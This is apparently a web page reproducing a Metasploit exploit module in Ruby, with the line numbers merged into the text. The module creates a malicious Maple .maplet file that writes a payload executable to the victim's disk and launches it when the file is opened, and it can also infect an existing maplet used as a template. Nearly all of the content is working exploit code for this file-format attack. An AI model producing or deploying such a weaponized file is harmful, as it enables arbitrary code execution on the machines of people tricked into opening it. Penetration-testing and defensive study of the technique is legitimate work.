Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::EXE1011def initialize(info = {})12super(update_info(info,13'Name' => 'Maple Maplet File Creation and Command Execution',14'Description' => %q{15This module harnesses Maple's ability to create files and execute commands16automatically when opening a Maplet. All versions up to 13 are suspected17vulnerable. Testing was conducted with version 13 on Windows. Standard security18settings prevent code from running in a normal maple worksheet without user19interaction, but those setting do not prevent code in a Maplet from running.2021In order for the payload to be executed, an attacker must convince someone to22open a specially modified .maplet file with Maple. By doing so, an attacker can23execute arbitrary code as the victim user.24},25'License' => MSF_LICENSE,26'Author' =>27[28'scriptjunkie'29],30'References' =>31[32[ 'OSVDB', '64541'],33[ 'URL', 'http://www.maplesoft.com/products/maple/' ]34],35'Payload' =>36{37'Space' => 1024,38'BadChars' => '',39'DisableNops' => true,40# 'Compat' =>41# {42# 'PayloadType' => 'cmd',43# 'RequiredCmd' => 'generic perl telnet',44# }45},46'Platform' => %w{ win linux unix },47'Targets' =>48[49[ 'Windows',50{51'Arch' => ARCH_X86,52'Platform' => 'win'53}54],5556[ 'Windows X64',57{58'Arch' => ARCH_X64,59'Platform' => 'win'60}61],6263[ 'Linux',64{65'Arch' => ARCH_X86,66'Platform' => 'linux'67}68],6970[ 'Linux X64',71{72'Arch' => ARCH_X64,73'Platform' => 'linux'74}75],7677['Universal CMD',78{79'Arch' => ARCH_CMD,80'Platform' => %w{ linux unix win }81}82]8384],85'DisclosureDate' => '2010-04-26',86'DefaultTarget' => 0))8788register_options(89[90OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),91OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),92])9394end959697def exploit98cmd = ''99content = ''100if target['Arch'] != ARCH_CMD101#Get payload as executable on whatever platform102binary = generate_payload_exe103104#Get filename and random variable name for file handle in script105fname = rand_text_alpha(3+rand(15))106if target['Platform'] == 'win'107fname << ".exe"108end109fhandle = rand_text_alpha(3+rand(15))110111#Write maple commands to create executable112content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"113exe = binary.unpack('C*')114115content << "writebytes(#{fhandle},[#{exe[0]}"116lines = []1171.upto(exe.length-1) do |byte|118if(byte % 100 == 0)119lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"120else121lines.push ",#{exe[byte]}"122end123end124content << lines.join("") + "]);\r\n"125126content << "fclose(" + fhandle + ");\n"127#Write command to be executed128if target['Platform'] != 'win'129content << "system(\"chmod a+x #{fname}\");\n"130end131content << "system[launch](\"#{fname}\");\n"132else133content << "system(\"#{payload.encoded}\");\n"134end135136#Then put the rest of the original maplet137if datastore['TEMPLATE'] != ''138File.open(datastore['TEMPLATE'], 'rb') do |fd|139content << fd.read( File.size(datastore['TEMPLATE']) )140end141end142143# Create the file144print_status("Creating '#{datastore['FILENAME']}' file...")145file_create(content)146end147end148149150